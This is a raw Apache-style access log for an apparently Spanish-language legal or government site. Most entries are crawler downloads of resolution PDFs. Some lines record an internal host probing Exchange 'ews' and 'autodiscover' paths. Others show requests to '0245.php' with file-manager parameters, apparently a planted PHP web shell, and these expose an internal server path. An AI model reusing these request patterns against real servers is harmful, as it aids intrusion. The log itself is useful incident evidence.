172.22.2.4 - - [20/Mar/2024:00:57:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [20/Mar/2024:00:59:59 -0500] "GET /BLA/resoluciones/AUTOS%202010/6408.pdf HTTP/1.1" 200 160488
172.22.2.4 - - [20/Mar/2024:00:58:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
216.244.66.195 - - [20/Mar/2024:01:00:25 -0500] "GET /BLA/resoluciones/AUTOS%202010/6573.pdf HTTP/1.1" 200 55480
216.244.66.195 - - [20/Mar/2024:01:00:50 -0500] "GET /BLA/resoluciones/AUTOS%202010/6707.pdf HTTP/1.1" 200 185181
216.244.66.195 - - [20/Mar/2024:01:01:16 -0500] "GET /BLA/resoluciones/AUTOS%202010/6815.pdf HTTP/1.1" 200 134465
52.149.22.81 - - [20/Mar/2024:01:01:24 -0500] "GET /Publicaciones/2024EE31841.pdf HTTP/1.1" 404 227
201.245.192.253 - - [20/Mar/2024:01:01:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
216.244.66.195 - - [20/Mar/2024:01:01:39 -0500] "GET /BLA/resoluciones/AUTOS%202011/3339.pdf HTTP/1.1" 200 226629
216.244.66.195 - - [20/Mar/2024:01:02:04 -0500] "GET /BLA/resoluciones/AUTOS%202011/3441.pdf HTTP/1.1" 200 224209
216.244.66.195 - - [20/Mar/2024:01:02:25 -0500] "GET /BLA/resoluciones/AUTOS%202011/3893.pdf HTTP/1.1" 200 155158
216.244.66.195 - - [20/Mar/2024:01:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202011/3910.pdf HTTP/1.1" 200 601538
216.244.66.195 - - [20/Mar/2024:01:03:05 -0500] "GET /BLA/resoluciones/AUTOS%202011/4003.pdf HTTP/1.1" 200 467360
216.244.66.195 - - [20/Mar/2024:01:03:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0013.pdf HTTP/1.1" 200 491219
172.22.2.4 - - [20/Mar/2024:01:03:35 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [20/Mar/2024:01:03:35 -0500] "GET /BLA/boletinlegal/Circulares/2013/Circular%20No.%206%20del%2019%20de%20julio%20de%202013.pdf HTTP/1.1" 200 4210437
216.244.66.195 - - [20/Mar/2024:01:03:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0439.pdf HTTP/1.1" 200 770400
216.244.66.195 - - [20/Mar/2024:01:03:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0621.pdf HTTP/1.1" 200 520574
216.244.66.195 - - [20/Mar/2024:01:04:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0719.pdf HTTP/1.1" 200 514667
216.245.221.92 - - [20/Mar/2024:01:04:16 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Mar/2024:01:04:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0848.pdf HTTP/1.1" 200 377473
172.22.2.4 - - [20/Mar/2024:01:04:31 -0500] "GET /BLA/boletinlegal/Temporary_Listen_Addresses HTTP/1.1" 404 1018
172.22.2.4 - - [20/Mar/2024:01:04:31 -0500] "GET /BLA/boletinlegal/ews/exchanges/ HTTP/1.1" 404 1018
172.22.2.4 - - [20/Mar/2024:01:04:32 -0500] "GET /BLA/boletinlegal/ews/exchange%20/ HTTP/1.1" 404 1018
172.22.2.4 - - [20/Mar/2024:01:04:32 -0500] "GET /BLA/boletinlegal/ews/exchange/ HTTP/1.1" 404 1018
172.22.2.4 - - [20/Mar/2024:01:04:33 -0500] "GET /BLA/boletinlegal/ews/%20/ HTTP/1.1" 403 1020
172.22.2.4 - - [20/Mar/2024:01:04:33 -0500] "GET /BLA/boletinlegal/ews/ews/ HTTP/1.1" 404 1018
172.22.2.4 - - [20/Mar/2024:01:04:34 -0500] "GET /BLA/boletinlegal/ews/autodiscovers/ HTTP/1.1" 404 1018
172.22.2.4 - - [20/Mar/2024:01:04:34 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscovers/ HTTP/1.1" 404 1018
172.22.2.4 - - [20/Mar/2024:01:04:34 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscover%20/ HTTP/1.1" 404 1018
172.22.2.4 - - [20/Mar/2024:01:04:35 -0500] "GET /BLA/boletinlegal/autodiscover/autodiscoverrs/ HTTP/1.1" 404 1018
172.22.2.4 - - [20/Mar/2024:01:04:35 -0500] "GET /BLA/boletinlegal/autodiscove/ HTTP/1.1" 404 1018
216.244.66.195 - - [20/Mar/2024:01:04:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1015.pdf HTTP/1.1" 200 430250
216.244.66.195 - - [20/Mar/2024:01:04:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1217.pdf HTTP/1.1" 200 1026493
216.244.66.195 - - [20/Mar/2024:01:05:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1544.pdf HTTP/1.1" 200 1270499
172.22.2.4 - - [20/Mar/2024:01:03:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [20/Mar/2024:01:05:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1984.pdf HTTP/1.1" 200 547304
172.22.2.4 - - [20/Mar/2024:01:04:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [20/Mar/2024:01:06:20 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
216.244.66.195 - - [20/Mar/2024:01:06:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2406.pdf HTTP/1.1" 200 1054962
216.244.66.195 - - [20/Mar/2024:01:07:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2535.pdf HTTP/1.1" 200 359408
216.244.66.195 - - [20/Mar/2024:01:07:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/02090.pdf HTTP/1.1" 200 273273
66.249.66.19 - - [20/Mar/2024:01:08:06 -0500] "GET /residuos/textiles/files/guia_textiles.pdf HTTP/1.1" 304 -
216.244.66.195 - - [20/Mar/2024:01:08:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/02167.pdf HTTP/1.1" 200 270750
216.244.66.195 - - [20/Mar/2024:01:08:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0303.pdf HTTP/1.1" 200 406945
216.244.66.195 - - [20/Mar/2024:01:09:02 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0429.pdf HTTP/1.1" 200 345672
216.245.221.92 - - [20/Mar/2024:01:09:16 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Mar/2024:01:09:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0665.pdf HTTP/1.1" 200 497160
216.244.66.195 - - [20/Mar/2024:01:09:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1096.pdf HTTP/1.1" 200 335078
216.244.66.195 - - [20/Mar/2024:01:10:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1108.pdf HTTP/1.1" 200 817229
66.249.66.20 - - [20/Mar/2024:01:10:45 -0500] "GET /Publicaciones/2024EE35186.pdf HTTP/1.1" 404 227
216.244.66.195 - - [20/Mar/2024:01:10:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1247.pdf HTTP/1.1" 200 488216
216.244.66.195 - - [20/Mar/2024:01:11:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1997.pdf HTTP/1.1" 200 304798
172.22.2.4 - - [20/Mar/2024:01:09:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [20/Mar/2024:01:11:30 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2164.pdf HTTP/1.1" 200 279476
216.244.66.195 - - [20/Mar/2024:01:11:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2236.pdf HTTP/1.1" 200 260990
172.22.2.4 - - [20/Mar/2024:01:10:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46420
216.244.66.195 - - [20/Mar/2024:01:12:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2416.pdf HTTP/1.1" 200 308397
172.22.2.4 - - [20/Mar/2024:01:10:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [20/Mar/2024:01:12:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2469.pdf HTTP/1.1" 200 277827
201.245.192.253 - - [20/Mar/2024:01:12:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
216.244.66.195 - - [20/Mar/2024:01:12:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2530.pdf HTTP/1.1" 200 291650
201.245.192.253 - - [20/Mar/2024:01:11:19 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
216.244.66.195 - - [20/Mar/2024:01:13:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2689.pdf HTTP/1.1" 200 302246
172.22.2.4 - - [20/Mar/2024:01:11:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53419
47.128.19.33 - - [20/Mar/2024:01:13:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0715.pdf HTTP/1.1" 200 3035
47.128.19.33 - - [20/Mar/2024:01:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.19.33 - - [20/Mar/2024:01:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.19.33 - - [20/Mar/2024:01:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.19.33 - - [20/Mar/2024:01:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.19.33 - - [20/Mar/2024:01:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.19.33 - - [20/Mar/2024:01:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.19.33 - - [20/Mar/2024:01:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.19.33 - - [20/Mar/2024:01:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.19.33 - - [20/Mar/2024:01:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.19.33 - - [20/Mar/2024:01:13:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
216.244.66.195 - - [20/Mar/2024:01:13:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2848.pdf HTTP/1.1" 200 278717
201.245.192.253 - - [20/Mar/2024:01:13:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37499
216.244.66.195 - - [20/Mar/2024:01:13:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2892.pdf HTTP/1.1" 200 283809
47.128.60.215 - - [20/Mar/2024:01:13:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4018.pdf&ft=img&white=1 HTTP/1.1" 200 405263
216.244.66.195 - - [20/Mar/2024:01:13:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/3087.pdf HTTP/1.1" 200 2929011
162.55.175.24 - - [20/Mar/2024:01:13:46 -0500] "GET / HTTP/1.1" 200 4720
